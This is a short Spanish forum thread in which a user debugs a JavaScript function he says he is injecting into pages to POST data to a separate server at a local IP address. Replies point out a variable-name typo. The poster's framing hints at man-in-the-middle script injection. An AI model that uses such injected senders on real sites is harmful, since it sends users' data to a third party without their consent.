elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web (Moderador: #!drvy)
| | |-+  Problema al enviar datos con XMLHttpRequest
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema al enviar datos con XMLHttpRequest  (Leído 2,447 veces)
Kaxperday


Desconectado Desconectado

Mensajes: 702


The man in the Middle


Ver Perfil WWW
Problema al enviar datos con XMLHttpRequest
« en: 23 Julio 2016, 11:59 am »

Hola buenas estoy inyectando un javascript que envía unos datos por post a un servidor, con XMLHttpRequest, os dejo el código:

Código
  1. function sender(cadena)
  2. {
  3.    var xmlHttp = new XMLHttpRequest();
  4.    xmlHttp.open("POST", "http://192.168.1.156:10000/");
  5.    xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  6.    xhttp.setRequestHeader("User-Agent", "helloo");
  7.    xmlHttp.send( cadena );
  8. }
  9.  

He probado a meter "alert();" para ver donde esta el problema y despúes del open muestra un alert(), pero despues del primer setRequestHeader ya no muestra más luego no llega a llamar al send(), ¿por qué?, como piden he llamado a open luego  setRequestHeader y luego a send el orden es el correcto.

Saludos y gracias.


En línea

Cuando el poder económico parasita al político ningún partido ni dictador podrá liberarnos de él. Se reserva el 99% ese poder.
ivancea96


Desconectado Desconectado

Mensajes: 3.412


ASMático


Ver Perfil WWW
Re: Problema al enviar datos con XMLHttpRequest
« Respuesta #1 en: 23 Julio 2016, 13:57 pm »

Mira los nombres de las variables.


En línea

Kaxperday


Desconectado Desconectado

Mensajes: 702


The man in the Middle


Ver Perfil WWW
Re: Problema al enviar datos con XMLHttpRequest
« Respuesta #2 en: 23 Julio 2016, 14:30 pm »

Mira los nombres de las variables.

Jajaja no puede ser, es lo que pasa de ir añadir el texto de las cabeceras de otro código jajaja, no puede ser!!

Ahora lo que pasa es que manda un SYN pero el server no le responde, habrá que ver porque :"D pero al menos lo manda al puerto asi que bien.

Saludos y gracias :'''')
« Última modificación: 23 Julio 2016, 14:36 pm por Kaxperday » En línea

Cuando el poder económico parasita al político ningún partido ni dictador podrá liberarnos de él. Se reserva el 99% ese poder.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema al enviar y recibir datos con el control winsock
Programación Visual Basic
arias 3 2,833 Último mensaje 30 Mayo 2006, 17:49 pm
por NemeSys
Problema al enviar datos a mysql
PHP
vnak 2 1,860 Último mensaje 19 Mayo 2009, 06:28 am
por [u]nsigned
Problema al enviar datos con winsock [SOLUCIONADO] « 1 2 »
Programación Visual Basic
ŞCØRPIØN-X3 13 5,767 Último mensaje 6 Abril 2011, 22:29 pm
por ŞCØRPIØN-X3
Problema IP, enviar datos [WinSock]
ASM
AdictoxD 4 3,196 Último mensaje 14 Enero 2013, 21:11 pm
por AdictoxD
Problema al subir una imagen con XMLHttpRequest y php
Desarrollo Web
yoelrodguez 2 3,688 Último mensaje 18 Septiembre 2022, 01:38 am
por yoelrodguez
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines